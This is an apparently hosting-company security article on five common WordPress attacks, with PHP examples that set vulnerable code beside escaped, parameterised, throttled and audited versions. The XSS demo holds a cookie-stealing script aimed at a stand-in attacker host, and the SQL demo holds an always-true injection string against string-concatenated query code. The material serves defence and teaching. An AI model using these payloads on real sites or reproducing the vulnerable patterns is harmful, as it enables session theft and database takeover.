5 Common WordPress Attacks and How to Stop Them

When it comes to cybersecurity, WordPress is a victim of its own success. Used on 35% of the world’s websites, its popularity makes it highly attractive to cybercriminals. While no less secure than other platforms, the sheer volume of WordPress websites means, statistically, there’s more chance of an attack. To help you to protect your site, here are five common forms of WordPress attack and advice on how to defend against them.

1. Cross-site scripting attacks

Also known as an XSS attack, cross-site scripting takes advantage of places where your website displays user-supplied data, such as comments, search terms or profile fields, without properly escaping it. An attacker submits input containing JavaScript, or a link that loads a script from a server they control, and if the site echoes that input back into a page as live HTML, the script runs in the browser of every visitor who views the page, including your administrators. From there it can steal session cookies and login information, perform actions with the logged-in administrator's privileges (such as creating a new admin account or installing a malicious plugin) and use your site to push further malware to your visitors.

The starting point in defending your site against XSS is to minimise the places where untrusted input can be submitted and then displayed. If you don't need comments on your website, disable them. If you do, activate the Akismet plugin that ships with WordPress; it filters out the vast majority of spam comments, many of which carry malicious links, although it is an anti-spam tool rather than an XSS control. The real defence is in the code: WordPress core already strips dangerous HTML from comments left by non-privileged users, so XSS most often enters through themes and plugins that print user input without escaping it. Keep WordPress core, themes and plugins up to date (WordPress 5.1.1 was a security release that fixed a cross-site scripting issue in the comments system, so make sure you are on that version or later), and if you write or commission theme or plugin code, insist that every value is passed through the escaping functions WordPress provides (esc_html(), esc_attr(), esc_url() and wp_kses_post()) at the point it is output.
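To make the escaping point concrete, here is an added example (not code from the original article): a theme-style fragment that echoes a visitor's search term, first the vulnerable way and then with context-appropriate escaping. Inside WordPress, esc_html() and esc_attr() already exist; the stand-in definitions at the top are hypothetical shims so the file also runs on its own with plain PHP.

```php
<?php
// Added example, not from the original article. Run with: php xss_escaping.php
//
// Inside WordPress esc_html() and esc_attr() are provided by core. Outside it,
// these shims (hypothetical stand-ins for this demo) give the same basic
// HTML-escaping behaviour so the file runs stand-alone.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}

// VULNERABLE: the search term is placed straight into the markup, so a
// request like ?s=<script>...</script> executes in every visitor's browser.
function render_search_heading_vulnerable(string $query): string {
    return '<h1>Results for: ' . $query . '</h1>'
         . '<input type="text" name="s" value="' . $query . '">';
}

// HARDENED: the same output, with each value escaped for the context it lands
// in (text node vs. attribute value). The payload is shown literally, not run.
function render_search_heading_safe(string $query): string {
    return '<h1>Results for: ' . esc_html($query) . '</h1>'
         . '<input type="text" name="s" value="' . esc_attr($query) . '">';
}

// Constructed attacker input standing in for $_GET['s']. The leading "> breaks
// out of the value="" attribute when it is not escaped.
$payload = '"><script>document.location="https://attacker.example/?c="+document.cookie</script>';

echo "Vulnerable:\n", render_search_heading_vulnerable($payload), "\n\n";
echo "Hardened:\n",   render_search_heading_safe($payload), "\n";
```

In a real theme the search term would come from get_search_query(), which escapes by default; the pattern matters for any value a plugin or theme pulls from a request, a comment or a user profile and prints itself.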

2. SQL injection

SQL is the language used to query the database that stores your posts, users and settings. An SQL injection attack feeds specially crafted input into a field (a login form, a search box, a URL parameter) that the site's code pastes into a database query as if it were part of the query rather than data. WordPress core uses parameterised queries for its own forms, so in practice the weakness is almost always in a plugin or theme that builds its own queries by joining strings together. Once the attacker controls part of a query, they can read or modify anything in the database. A common tactic is to create a new admin user or overwrite an existing user's password hash, effectively locking you out of your own website; with admin access, the hacker can then use the site for their own purposes and steal all the user data in the database.

The main exposure to SQL injection comes from themes and plugins which aren't written to defend against it. Those available from the WordPress.org repository are reviewed on submission and can generally be regarded as reasonably safe, provided they are still regularly updated and compatible with current WordPress versions; remove any plugin that hasn't seen an update in years. Themes and plugins distributed outside the repository, in particular pirated "nulled" copies of premium products, undergo no such scrutiny and have been found to ship with backdoors. If you use third-party themes and plugins, buy them from a reputable developer, and if you write any database code yourself, build every query with $wpdb->prepare() rather than by string concatenation.
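The difference between a concatenated and a parameterised query is easiest to see side by side. The following is an added example, not code from the original article or from WordPress: a plugin-style user lookup against an in-memory SQLite table with constructed sample rows, so it runs on its own (it needs PHP's pdo_sqlite extension). The WordPress equivalent of the safe version is $wpdb->prepare() with %s placeholders, as noted in the comments.

```php
<?php
// Added example, not from the original article. Run with: php sqli_demo.php
// Inside WordPress the hardened form would be:
//   $wpdb->get_results($wpdb->prepare("SELECT ID, user_login FROM {$wpdb->users} WHERE user_login = %s", $login));

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed stand-in for the wp_users table.
$db->exec("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)");
$db->exec("INSERT INTO wp_users (user_login, user_pass) VALUES ('alice', 'hash-a'), ('bob', 'hash-b')");

// VULNERABLE: the login field is pasted into the SQL text, so quote characters
// in the input change the structure of the query.
function find_user_vulnerable(PDO $db, string $login): array {
    $sql = "SELECT ID, user_login FROM wp_users WHERE user_login = '" . $login . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: the login field is bound as a parameter. Whatever characters it
// contains, it is compared as a value and can never alter the query.
function find_user_safe(PDO $db, string $login): array {
    $stmt = $db->prepare("SELECT ID, user_login FROM wp_users WHERE user_login = ?");
    $stmt->execute([$login]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: closes the quoted string and appends an
// always-true condition, turning a lookup for one user into a dump of all users.
$payload = "x' OR '1'='1";

echo "Concatenated query matched ", count(find_user_vulnerable($db, $payload)), " user(s) for a bogus login\n";
echo "Parameterised query matched ", count(find_user_safe($db, $payload)), " user(s)\n";
```

Run it and the concatenated query returns every row in the table for a username that does not exist, while the parameterised query returns nothing; the same payload in a password-reset or role-update query is how the admin-takeover described above happens.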

3. Brute force attacks

A brute force attack is where a cybercriminal tries to gain access to the back end of your website by guessing an administrator's username and password, typically against the wp-login.php form or the xmlrpc.php endpoint, which also accepts credentials. While this may sound like hard work, don't make the mistake of picturing someone sat at a screen repeatedly typing guesses into your wp-admin page. Today's attackers use automated tools that try thousands of combinations a minute.

Those tools draw on huge datasets of credentials stolen in previous breaches (so-called credential stuffing) and lists of the most common passwords, which greatly improves the odds of a correct guess. Even where several thousand separate attempts are needed, the process is fully automated. What's more, by routing attempts through a botnet or a pool of proxy servers so that the source IP address changes every few requests, the attacker evades simple defences that block an address after a number of failed logins.

There are many ways to make the attacker's job harder: use unique usernames rather than "admin", enforce strong and unique passwords, add a CAPTCHA to the login form, limit failed login attempts, disable XML-RPC if nothing you use depends on it, and even change the address of the wp-admin page. However, the best protection against brute force attacks is two-factor authentication. That way, even if the attacker guesses the credentials correctly, they will still need your phone for the randomly generated, time-limited code required to complete the login.
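The "limit failed login attempts" control, and why it is not enough on its own against an attacker who rotates IP addresses, is shown in this added example (not code from the original article or any WordPress plugin). It is a small throttle that counts failures per source IP and per username; the in-memory store and the constructed attack sequence are there so it runs stand-alone under PHP 8, and the comments name the real WordPress hooks a plugin would wire it to.

```php
<?php
// Added example, not from the original article. Run with: php login_throttle.php
//
// In a real plugin this would be wired to two real WordPress hooks:
//   add_action('wp_login_failed', fn($username) => $throttle->recordFailure($ip, $username, time()));
//   add_filter('authenticate', function ($user, $username) use ($throttle, $ip) {
//       return $throttle->isLocked($ip, $username, time())
//           ? new WP_Error('locked', 'Too many failed logins, try again later.')
//           : $user;
//   }, 30, 2);
// and would persist counters with set_transient()/get_transient() instead of an
// array. Take $ip from $_SERVER['REMOTE_ADDR']; only trust X-Forwarded-For if a
// proxy you control sets it, otherwise the attacker chooses the value.

final class LoginThrottle {
    /** @var array<string, int[]> key => timestamps of recent failures */
    private array $failures = [];

    public function __construct(
        private int $maxAttempts = 5,
        private int $windowSeconds = 900,
    ) {}

    // Record one failure against both the IP and the (case-folded) username, so
    // an attacker cycling through addresses still trips the per-account limit.
    public function recordFailure(string $ip, string $username, int $now): void {
        foreach ($this->keysFor($ip, $username) as $key) {
            $this->failures[$key][] = $now;
        }
    }

    // Locked if either the IP or the username has too many failures inside the
    // sliding window; stale timestamps are pruned as a side effect.
    public function isLocked(string $ip, string $username, int $now): bool {
        foreach ($this->keysFor($ip, $username) as $key) {
            $recent = array_values(array_filter(
                $this->failures[$key] ?? [],
                fn(int $t) => $t > $now - $this->windowSeconds
            ));
            $this->failures[$key] = $recent;
            if (count($recent) >= $this->maxAttempts) {
                return true;
            }
        }
        return false;
    }

    private function keysFor(string $ip, string $username): array {
        return ['ip:' . $ip, 'user:' . strtolower($username)];
    }
}

// --- Demo with constructed input -------------------------------------------
$throttle = new LoginThrottle(maxAttempts: 5, windowSeconds: 900);
$t = 1_700_000_000;

// The attacker sends one guess from each of five addresses at the same account.
// A per-IP-only counter would see one failure per address and never block.
foreach (['203.0.113.1', '203.0.113.2', '203.0.113.3', '203.0.113.4', '203.0.113.5'] as $i => $ip) {
    $throttle->recordFailure($ip, 'admin', $t + $i);
}

var_dump($throttle->isLocked('203.0.113.6', 'admin',  $t + 10));   // sixth address, same account
var_dump($throttle->isLocked('203.0.113.6', 'editor', $t + 10));   // untouched account
var_dump($throttle->isLocked('203.0.113.6', 'admin',  $t + 1000)); // after the window has passed
```

The per-username counter is what catches the rotating attacker, but it also means an attacker can lock a real user out by hammering their username, which is another reason to treat throttling as a speed bump and two-factor authentication as the actual control.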

4. Wp-config attacks

The WordPress file wp-config.php is the key configuration file for your site. It holds the database name, username and password, the table prefix, and the secret keys and salts used to sign login cookies. Anyone who can read it can connect to your database (and from there read or replace user accounts and password hashes) or forge administrator sessions, which is why it is a common target of attack.

Attackers rarely reach wp-config.php directly. They look for a vulnerability in a plugin or theme, such as an arbitrary file download or path traversal flaw, that lets them read files from the server, or for a misconfigured server that serves .php files as plain text or exposes editor backup copies such as wp-config.php~ or wp-config.php.bak. Enabling automatic updates ensures patches are applied as soon as they are released, which closes the most common route. You can also move the file one directory above your web root (WordPress looks there automatically, provided that directory is not itself a WordPress install), restrict its permissions so that only the web server account can read it, and add a rule to your web server configuration denying direct requests for it.
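A practitioner will want to check those points rather than assume them. Below is an added example (not from the original article or from WordPress itself): a command-line audit script that locates wp-config.php in or above a document root and reports the hardening gaps discussed above. By default it writes a constructed, deliberately weak wp-config.php into a temporary directory so it runs on its own; pass a real document root as the first argument to audit an actual install. The checks and messages are this example's own, not a WordPress tool.

```php
<?php
// Added example, not from the original article.
// Run stand-alone:           php wpconfig_audit.php
// Run against a real site:   php wpconfig_audit.php /var/www/html

function audit_wp_config(string $docroot): array {
    $findings = [];

    // WordPress loads wp-config.php from the document root, or failing that from
    // the directory above it. The parent location keeps it out of the served tree.
    $inRoot    = $docroot . '/wp-config.php';
    $aboveRoot = dirname($docroot) . '/wp-config.php';
    $path = file_exists($inRoot) ? $inRoot : (file_exists($aboveRoot) ? $aboveRoot : null);
    if ($path === null) {
        return ["wp-config.php not found in $docroot or its parent directory"];
    }
    if ($path === $inRoot) {
        $findings[] = "wp-config.php sits inside the web root ($inRoot); consider moving it to " . dirname($docroot);
    }

    // Group- or world-readable config leaks DB credentials to every account on the host.
    $mode = fileperms($path) & 0777;
    if ($mode & 0044) {
        $findings[] = sprintf('wp-config.php is readable by group/others (mode %04o); use 0600 or 0640', $mode);
    }

    // Leftover editor backups are served as plain text by most web servers.
    foreach (['~', '.bak', '.old', '.save'] as $suffix) {
        if (file_exists($path . $suffix)) {
            $findings[] = 'backup copy present: ' . basename($path . $suffix);
        }
    }

    $src = file_get_contents($path);

    // Placeholder salts mean login cookies can be forged by anyone who knows the defaults.
    if (str_contains($src, 'put your unique phrase here')) {
        $findings[] = 'AUTH_KEY/SALT values still contain the placeholder text; generate real salts';
    }

    // Without this, any compromised admin session can write PHP through the built-in editor.
    if (!preg_match('/define\(\s*[\'"]DISALLOW_FILE_EDIT[\'"]\s*,\s*true\s*\)/', $src)) {
        $findings[] = 'DISALLOW_FILE_EDIT is not set to true';
    }

    // Displaying errors shows file paths and failed queries to visitors.
    if (preg_match('/define\(\s*[\'"]WP_DEBUG_DISPLAY[\'"]\s*,\s*true/', $src)) {
        $findings[] = 'WP_DEBUG_DISPLAY is true; PHP errors will be shown to visitors';
    }

    return $findings;
}

// --- Demo: audit a constructed weak config unless a real docroot is given ----
$docroot = $argv[1] ?? null;
if ($docroot === null) {
    $docroot = sys_get_temp_dir() . '/wpaudit_' . bin2hex(random_bytes(4)) . '/html';
    mkdir($docroot, 0755, true);
    file_put_contents($docroot . '/wp-config.php', <<<'CFG'
    <?php
    define('DB_NAME', 'wordpress');
    define('DB_USER', 'wpuser');
    define('DB_PASSWORD', 'changeme');
    define('AUTH_KEY', 'put your unique phrase here');
    define('WP_DEBUG', true);
    define('WP_DEBUG_DISPLAY', true);
    CFG);
    chmod($docroot . '/wp-config.php', 0644);
}

foreach (audit_wp_config($docroot) as $finding) {
    echo "- $finding\n";
}
```

The location check mirrors how WordPress itself resolves the file, so "move it up one level" is only a valid fix when the parent directory is not web-served and does not contain another WordPress installation.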

5. DDoS attacks

DDoS, or distributed denial of service, attacks bombard a server with so many requests that it cannot cope and stops responding. They are famously used by state-sponsored hackers and major hacking groups to take down the servers of large corporations, public utilities, governments and the military, but they can be aimed at any website. In a DDoS attack the hacker is not trying to get into your site or steal your data; they simply want to take your services offline, perhaps to extort a ransom or to damage your business.

DDoS attacks work by flooding your servers with traffic. This is often achieved by hackers renting a DDoS attack from a criminal gang on the dark web. That gang will have used malware infections to take control of huge numbers of computers around the world (a botnet) and will instruct them all to request your site at the same time and keep doing so. Even Amazon Web Services had to absorb an attack in early 2020 that peaked at 2.3 terabits per second.

For most WordPress users, defending against DDoS attacks is the responsibility of their web host, which manages the server on their behalf. If you manage your own servers, put a CDN or DDoS-mitigation service in front of the site so that floods are absorbed before they reach your origin, monitor your web traffic, and rate-limit or block addresses that make an abnormal number of requests, especially from locations that do not normally send you traffic. Bear in mind that blocking individual IPs is of limited use against a botnet with tens of thousands of sources, which is why upstream filtering matters more than rules on the origin server.


All websites, whether built with WordPress or not, are vulnerable to cyberattacks. The five attacks above are among the most common affecting WordPress, though they are also used against other platforms. Hopefully, the advice given here will help you defend against them.

For hosting with built-in security, visit our homepage.

